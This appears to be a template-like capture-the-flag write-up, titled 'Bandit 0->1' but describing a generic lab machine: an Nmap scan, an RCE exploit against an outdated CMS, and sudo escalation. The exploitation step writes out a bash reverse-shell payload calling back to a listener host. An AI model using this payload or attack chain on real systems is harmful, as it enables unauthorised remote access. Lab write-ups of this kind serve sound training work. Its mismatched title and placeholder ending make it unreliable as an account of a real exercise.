💻 TORHAT

Bandit 0->1

🔍 Reconnaissance

I started with an Nmap scan to identify open ports and services running on the machine.

```bash
nmap -sC -sV -oN initial_scan.txt 10.10.10.123
```

💥 Exploitation

A vulnerable web server running an outdated CMS was discovered. I crafted a payload using a known RCE exploit.

```bash
python exploit.py --url http://10.10.10.123 --payload 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'
```

🏁 Privilege Escalation

After gaining a shell as `www-data`, I checked for sudo permissions and found a misconfigured binary.

```bash
sudo /usr/bin/vuln_binary
```

Using `GTFOBins`, I escalated to root.

Conclusion

Now you know how to write a blog. Happy hacking!